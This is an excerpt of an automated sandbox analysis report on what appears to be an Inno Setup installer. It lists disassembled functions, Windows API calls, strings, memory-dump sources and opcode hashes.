                                                                            • Instruction ID: b0804e078831a813d9aa2463563e291fc03c9a68ee142e2bda9a21ea894dad8b
                                                                            • Opcode Fuzzy Hash: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
                                                                            • Instruction Fuzzy Hash: AFB09B7670C600DDB709D6D6745552D63D8D7C47207E145B7F001D2580D93C58004928
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041655C Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                            • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                            • Opcode Fuzzy Hash: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                            • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00447FBC Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
                                                                            • Instruction ID: 3d9dac49d769706550815f3fb3cd696203b03cba94e1f0501d82b18e9078b8ff
                                                                            • Opcode Fuzzy Hash: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
                                                                            • Instruction Fuzzy Hash: 7A517770E041499FEB00EFA9C882AAEBBF5EB45314F51416BE504A7351DB389D46CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045BF90 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045C020
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                            • Instruction ID: 7372c421533d8f65bf23ff6fb62ce760878112a7f7dadb819c72ada28c104ff7
                                                                            • Opcode Fuzzy Hash: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                            • Instruction Fuzzy Hash: 4C1133716002049BDB10EE59C8C2B5B7794EF8475AF05446AFD589B2C7DB38E809CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041F334 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                            • Instruction ID: e05957f4d255e36abe150b4c83bb7920b28d063535c27f5b5ffcdbb78f87973e
                                                                            • Opcode Fuzzy Hash: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                            • Instruction Fuzzy Hash: 13114C742407059BC710DF59D880B86FBE5EB99350B10C53BE9688B385D378E946CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00451948 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,004519B1), ref: 00451993
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1452528299-0
                                                                            • Opcode ID: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                            • Instruction ID: 105945ddca3cabd7714cdb0ae074d91085a40d6b67da20b4593713f233405893
                                                                            • Opcode Fuzzy Hash: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                            • Instruction Fuzzy Hash: 740170756082486F8B00DF699C509EEFBE8EB4D72071083B7FC54D3791D6344D05D668
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045BF38 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,0045C016), ref: 0045BF4F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                            • Instruction ID: 2913e94657538f1a306bb7ed27eed344dd43a6c30afdb59308231f58c8b71720
                                                                            • Opcode Fuzzy Hash: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                            • Instruction Fuzzy Hash: FCD0E9B17557045BDF90EE794C81B0237D8BB48701F5084666908DB286E774E8048E58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406EB0 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                            • Opcode Fuzzy Hash: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0044AEEC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044AE98: GetVersionExA.KERNEL32(00000094), ref: 0044AEB5
                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B05D
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B06F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B081
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B093
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B0A5
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B0B7
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B0C9
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B0DB
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0ED
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0FF
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B111
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B123
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B135
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B147
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B159
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B16B
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B17D
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B18F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B1A1
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B1B3
                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B1C5
                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B1D7
                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1E9
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1FB
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B20D
                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B21F
                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B231
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B243
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B255
                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B267
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                            • API String ID: 1968650500-2910565190
                                                                            • Opcode ID: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                            • Instruction ID: 3769fa21ef169b5859ff7299002385904a822408566faed309fb3dc54f14a28c
                                                                            • Opcode Fuzzy Hash: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                            • Instruction Fuzzy Hash: 3891C2F0A40B50EBEF00EBF5D886E2A32A8EA56B1471445BBB444EF295D77CC8058F5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004569D4 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00456A3B
                                                                            • QueryPerformanceCounter.KERNEL32(021E3858,00000000,00456CCE,?,?,021E3858,00000000,?,004573CA,?,021E3858,00000000), ref: 00456A44
                                                                            • GetSystemTimeAsFileTime.KERNEL32(021E3858,021E3858), ref: 00456A4E
                                                                            • GetCurrentProcessId.KERNEL32(?,021E3858,00000000,00456CCE,?,?,021E3858,00000000,?,004573CA,?,021E3858,00000000), ref: 00456A57
                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00456ACD
                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021E3858,021E3858), ref: 00456ADB
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B23
                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00456C79,?,00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B5C
                                                                              • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C05
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00456C3B
                                                                            • CloseHandle.KERNEL32(000000FF,00456C80,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C73
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                            • API String ID: 770386003-3271284199
                                                                            • Opcode ID: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                            • Instruction ID: 1494ba0c9f092ba5553c36d9802a3eccbba6a72ce31e74165ab773d774e4cee1
                                                                            • Opcode Fuzzy Hash: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                            • Instruction Fuzzy Hash: 90714570A003449FDB11DB69CC41B9EBBF8EB09305F5185BAF908FB282D77859488F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045AEE4 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 0045AEFE
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045AF1E
                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045AF2B
                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045AF38
                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045AF46
                                                                              • Part of subcall function 0045ADEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045AE8B,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045AE65
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045AFFF
                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045B008
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                            • API String ID: 59345061-4263478283
                                                                            • Opcode ID: 2e1c75f00da70986db0bef7873a233c0400535374564b15abc59da2f2a3f743b
                                                                            • Instruction ID: e1143608cea91b2c9fc6243bba76dd5dc8e0698664409433b5fa99cab1fe32bf
                                                                            • Opcode Fuzzy Hash: 2e1c75f00da70986db0bef7873a233c0400535374564b15abc59da2f2a3f743b
                                                                            • Instruction Fuzzy Hash: 275191B1900608EFDB10DF99C851BAFB7B8EB09751F14806AF915B7381C3389948CFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004734AC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004734FF
                                                                            • GetLastError.KERNEL32(?,?), ref: 00473508
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00473555
                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00473579
                                                                            • CloseHandle.KERNEL32(00000000,004735AA,00000000,00000000,000000FF,000000FF,00000000,004735A3,?,?,?), ref: 0047359D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCodeErrorExecuteExitHandleLastMultipleObjectsProcessShellWait
                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                            • API String ID: 171997614-221126205
                                                                            • Opcode ID: 468cd06050aeac50d7fc6c39a96f1f48007959102f91cd93909f9b3bed5077f9
                                                                            • Instruction ID: 9270c58e3c51a63ec14468394db3a8dd1a523cee094c78596453f11dd74f1eb5
                                                                            • Opcode Fuzzy Hash: 468cd06050aeac50d7fc6c39a96f1f48007959102f91cd93909f9b3bed5077f9
                                                                            • Instruction Fuzzy Hash: F72177B0A00114BEDB11EFA99842BDE76E8EB04309F50847BF508E7382DB7C8B059B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004227CC Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422964
                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422B2E), ref: 00422974
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1631623395-0
                                                                            • Opcode ID: 922aa224a59eb388fd409ef1a4572993a041e07f03dc34a9f221e61418859b32
                                                                            • Instruction ID: 2ef64a615a047e5f68810d1bba8f9c023c2191b8b92af7ee41424443907fb462
                                                                            • Opcode Fuzzy Hash: 922aa224a59eb388fd409ef1a4572993a041e07f03dc34a9f221e61418859b32
                                                                            • Instruction Fuzzy Hash: F0919271B04214FFD710EBA9DA86F9D77F4AB09304F5100B6F504AB3A2C778AE419B58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004182F4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00418303
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00418320
                                                                            • GetWindowRect.USER32(?), ref: 0041833C
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041834A
                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 0041835F
                                                                            • ScreenToClient.USER32(00000000), ref: 00418368
                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418373
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                            • String ID: ,
                                                                            • API String ID: 2266315723-3772416878
                                                                            • Opcode ID: e2831b492a02c7fbc1c424da0d3d82ddc563106dbc431b226c0011ccd89e5e33
                                                                            • Instruction ID: 9cf88c6662a8b54f2d940af1896da5675c8924d24fa9a5d7825e36bf04e718ba
                                                                            • Opcode Fuzzy Hash: e2831b492a02c7fbc1c424da0d3d82ddc563106dbc431b226c0011ccd89e5e33
                                                                            • Instruction Fuzzy Hash: 40112B71505201AFDB00DF69C885F9B77E8AF49314F18067EBD58DB286C739D900CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00478334 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000,00000000), ref: 00478395
